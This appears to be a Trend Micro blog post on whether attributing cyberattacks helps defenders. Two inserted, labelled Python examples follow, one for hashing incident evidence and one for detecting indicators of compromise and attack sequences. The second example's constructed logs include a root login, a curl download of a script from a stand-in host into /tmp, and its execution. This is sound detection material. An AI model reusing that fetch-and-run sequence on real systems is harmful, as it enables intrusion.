Whodunnit? The superior detective dazzles us with brilliance, skill, and patience to unmask the bad guy. The interplay of forensic science and psychological insight has fascinated us from Sherlock Holmes to the CSI television series. Sometimes the answer is completely surprising, as in Murder on the Orient Express. Other times, the mystery is known to us all, and promptly dismissed: “The Major has been shot. Round up the usual suspects.”
Earlier this week the iSMG Fraud and Breach Prevention Summit in New York City featured a fascinating conversation on the value of attribution, led by Gartner’s Avivah Litan. The panel was called: “Moving from Indicators of Compromise to Indicators of Attack: But Will Attacker Attribution Really Help Us?” The panelists were Jackie Castelli from CrowdStrike, Noam Jolles from Diskin Advanced Technologies, and Richard T. Jacobs from the FBI New York Division. This note offers my observations on that conversation.
In the cybersecurity domain, what is the value of attribution? There are four possible reasons for identifying the individual or team that caused an information security breach.
Preserving evidence should be a part of any organization’s cyber incident response plan. Not having a plan can lead to very difficult choices. One firm had to choose between preserving the evidence and re-establishing online operations. They decided to restore their systems to a state before the attack occurred and get back online. This choice has two problems. First, by restoring the system to its pre-attack state, the firm recreated the same vulnerabilities that had been used against it successfully. The attacker could cause the same problem again with little difficulty. Second, the attacker did not have to cover their tracks: the victim did it for them. The attacker could use the same attack against another victim, with nothing recorded from the first incident to establish a pattern.
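The practical fix for the dilemma above is to collect and fingerprint the evidence before the rebuild, so that restoring the system does not also erase the record of what happened. The following script is an added example, not code from the original post or from any Trend Micro product. It assumes the responder has already copied the artifacts (logs, a memory dump, a disk image) into one directory, and it writes a manifest of SHA-256 digests that can be handed to law enforcement and re-checked later; the two log files it creates are constructed samples.

```python
"""Hash-manifest for collected incident evidence (added example, not from the post).

Assumption: artifacts have already been copied into `evidence_dir`. The manifest
records a SHA-256 digest, size and collection time for each file, so anyone who
later receives the evidence can verify that it has not been altered by cleanup,
restoration or accident.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # hash in 1 MiB chunks so disk images never have to fit in memory


def sha256_file(path):
    """Streaming SHA-256 of one file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(evidence_dir, case_id, collector):
    """Walk evidence_dir and record a digest for every file, in a stable order."""
    entries = []
    for root, _, files in os.walk(evidence_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            entries.append({
                "path": os.path.relpath(path, evidence_dir),
                "size": os.path.getsize(path),
                "sha256": sha256_file(path),
            })
    return {
        "case_id": case_id,            # hypothetical case identifier
        "collector": collector,
        "collected_utc": datetime.now(timezone.utc).isoformat(),
        "files": entries,
    }


def verify_manifest(evidence_dir, manifest):
    """Return the relative paths whose digest no longer matches; empty means intact."""
    changed = []
    for entry in manifest["files"]:
        path = os.path.join(evidence_dir, entry["path"])
        if not os.path.exists(path) or sha256_file(path) != entry["sha256"]:
            changed.append(entry["path"])
    return changed


def demo():
    """Constructed sample: two small artifacts, a manifest, then a detected change."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "auth.log"), "w") as f:          # constructed log line
            f.write("Mar 10 02:14:07 web1 sshd[4121]: Accepted password for root from 203.0.113.7\n")
        with open(os.path.join(d, "access.log"), "w") as f:        # constructed log line
            f.write('203.0.113.7 - - [10/Mar/2017:02:14:09 +0000] "POST /upload.php HTTP/1.1" 200 41\n')
        manifest = build_manifest(d, case_id="IR-0042", collector="responder")
        with open(os.path.join(d, "manifest.json.txt"), "w") as f:
            json.dump(manifest, f, indent=2)
        intact = verify_manifest(d, manifest)      # nothing has changed yet
        with open(os.path.join(d, "auth.log"), "a") as f:
            f.write("cleanup\n")                     # simulate a restore touching the evidence
        tampered = verify_manifest(d, manifest)    # auth.log is reported
        return intact, tampered


if __name__ == "__main__":
    print(demo())
```

Keep the manifest (and ideally a signed copy of it) somewhere the restore cannot reach; the digests are only useful if the manifest itself survives the rebuild.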
Law enforcement ultimately must determine the actual source of an attack. By working with law enforcement, firms can help them develop and evaluate evidence. As a colleague wrote,
“One of the main reasons we don’t attribute publicly is that it is so easy to get it wrong. The only people who realistically can say for sure that a criminal attack occurred are Law Enforcement – and even then only after reviewing all evidence, supplied by industry and gathered themselves, including that from seized suspect machines. For state-level attribution, only a military or intelligence agency that, through its own counter-intelligence operations, has a deep understanding of the person on the other side can do so. Otherwise, it is very easy to drop false flags – clues that point to another attack group. Imagine the scenario of an intelligence unit from country X hitting a gas company in the Middle East. Adding in some Russian strings and, given Russia’s natural interest in gas as a resource, they will for sure get the blame. Consider a criminal group hacking a bank: Drop one copy of Lazarus malware on the machine, and North Korea will be accused. Even if you think it is a group from country X, is it a state group, state-sponsored, contractor, state-condoned, dissident, patriot, criminal, etc.?”
Governments need to know who attacked their interests in order to frame a proportionate response. Knowing the actual source lets a government act confidently against the actual adversary rather than launch a misguided action against the wrong one. Further, in some cases, while the attack may have originated from a government-sponsored organization, the individual perpetrating it may not have been acting with governmental authorization. A rogue individual may use the capabilities provided to him or her without direct orders to do so.
Potential targets benefit from understanding the sequence of events that culminates in a cyber incident against them. In this case, attribution means understanding the attack well enough to anticipate and interrupt it before actual harm occurs. By identifying the specific attack, the target can take defensive measures to avoid the harmful consequences. US-CERT and the ISACs publish alerts about attacks with sufficient information for this purpose.
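To make the point concrete, here is how an alert like the ones just mentioned turns into a defensive check. The script is an added example, not code from the original post and not derived from any actual US-CERT or ISAC alert: the indicators and the syslog-style lines are constructed for illustration. It first matches the alert's indicators of compromise (an IP, a domain, a file hash) against the logs, then applies an indicator-of-attack rule keyed on the sequence "remote login, download, execution from /tmp" on one host within a short window, which still fires when the attacker swaps out every one of those indicator values.

```python
"""IOC matching and an IOA sequence rule over sample logs (added example, not from the post).

Everything below is constructed: the indicator values, the hosts and the log lines
are placeholders, not data from any published alert.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed indicators, in the shape an alert typically lists them.
IOCS = {
    "ip": {"203.0.113.7"},
    "domain": {"update-check.example.net"},
    "sha256": {"0123456789abcdef" * 4},  # placeholder digest, not a real sample
}

# Constructed syslog-style lines from two hosts. web1 shows the full sequence;
# db1 shows a legitimate download so the rule has a negative case to ignore.
SAMPLE_LOGS = """\
Mar 10 02:14:07 web1 sshd[4121]: Accepted password for root from 203.0.113.7 port 51324 ssh2
Mar 10 02:14:09 web1 sudo: root : COMMAND=/usr/bin/curl -o /tmp/a.sh http://update-check.example.net/a.sh
Mar 10 02:14:10 web1 audit: exec pid=4188 path=/tmp/a.sh sha256=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
Mar 10 02:15:00 web1 sshd[4130]: Accepted publickey for deploy from 198.51.100.5 port 50001 ssh2
Mar 10 03:00:00 db1 sudo: ops : COMMAND=/usr/bin/curl -o /tmp/pkg.tgz https://repo.example.org/pkg.tgz
Mar 10 03:00:02 db1 audit: exec pid=9001 path=/tmp/pkg.tgz sha256=ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
"""

LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_HOST_RE = re.compile(r"https?://([^/\s:]+)")
SHA256_RE = re.compile(r"sha256=([0-9a-f]{64})")


def parse(line, year=2017):
    """Split a syslog line into (timestamp, host, message); None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["host"], m["msg"]


def ioc_hits(logs, iocs=IOCS):
    """Return (line_number, indicator_type, value) for every listed IOC seen in the logs."""
    hits = []
    for n, line in enumerate(logs.splitlines(), 1):
        parsed = parse(line)
        if not parsed:
            continue
        msg = parsed[2]
        for ip in IP_RE.findall(msg):
            if ip in iocs["ip"]:
                hits.append((n, "ip", ip))
        for host in URL_HOST_RE.findall(msg):
            if host in iocs["domain"]:
                hits.append((n, "domain", host))
        for digest in SHA256_RE.findall(msg):
            if digest in iocs["sha256"]:
                hits.append((n, "sha256", digest))
    return hits


def classify(msg):
    """Map a message to a coarse behaviour, independent of any specific indicator value."""
    if "sshd" in msg and "Accepted" in msg:
        return "remote_login"
    if "COMMAND=" in msg and ("curl" in msg or "wget" in msg):
        return "download"
    if msg.startswith("audit: exec") and " path=/tmp/" in msg:
        return "exec_from_tmp"
    return None


def ioa_hits(logs, window=timedelta(minutes=5)):
    """Hosts where remote_login -> download -> exec_from_tmp occur in that order within `window`."""
    events = defaultdict(list)
    for line in logs.splitlines():
        parsed = parse(line)
        if not parsed:
            continue
        kind = classify(parsed[2])
        if kind:
            events[parsed[1]].append((parsed[0], kind))
    flagged = []
    for host, evs in events.items():
        evs.sort()
        for i, (t0, k0) in enumerate(evs):
            if k0 != "remote_login":
                continue
            later = [k for t, k in evs[i + 1:] if t - t0 <= window]
            if "download" in later and "exec_from_tmp" in later[later.index("download"):]:
                flagged.append(host)
                break
    return flagged


if __name__ == "__main__":
    print(ioc_hits(SAMPLE_LOGS))   # the three indicator matches on web1
    print(ioa_hits(SAMPLE_LOGS))   # ['web1']; db1 downloaded and ran a file but nobody logged in first
```

The IOC pass is cheap and exact but stops working the moment the attacker changes an address or recompiles; the IOA rule is what lets a target interrupt the next run of the same playbook, which is the sense of "attribution" this paragraph is about.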
Revenge is never a good idea. Individuals and corporations may have a fair level of certainty about the source of an attack. Beware though! A vengeful act could disrupt an ongoing criminal investigation. The vengeful actor could itself face a criminal investigation: unauthorized access to someone else’s systems is illegal, regardless of which side is doing it or who started it. Cyber criminals, hacktivists, and foreign intelligence services have significant skills. They can plant misleading clues pointing to another party. While it may be embarrassing to suffer a breach, it would be substantially more consequential to disrupt some innocent third party in an erroneous and misguided attempt to punish the suspected perpetrator.
Moreover, sometimes an attack is not actually an attack. Consider the recent OnionDog incident, which turned out to be a cyber drill rather than a targeted attack: http://blog.trendmicro.com/trendlabs-security-intelligence/oniondog-not-targeted-attack-cyber-drill/
At Trend Micro we do not attribute attacks to nations. We share evidence with national law enforcement agencies to assist in their pursuit of a wrongdoer. See these blog posts on fighting cybercrime, collaboration with law enforcement, and working with Interpol, and this statement by our late CTO, Raimund Genes, from our YouTube Channel. We strongly discourage any (potentially criminal) acts of retribution or lex talionis. We work diligently to reveal attack patterns to assist our clients and the larger world to recognize, prepare for, and thwart hostile and disruptive acts.
Who did it? If they didn’t do much, it doesn’t much matter.
What are your thoughts on this? Post a comment below, or tweet me @WilliamMalikTM.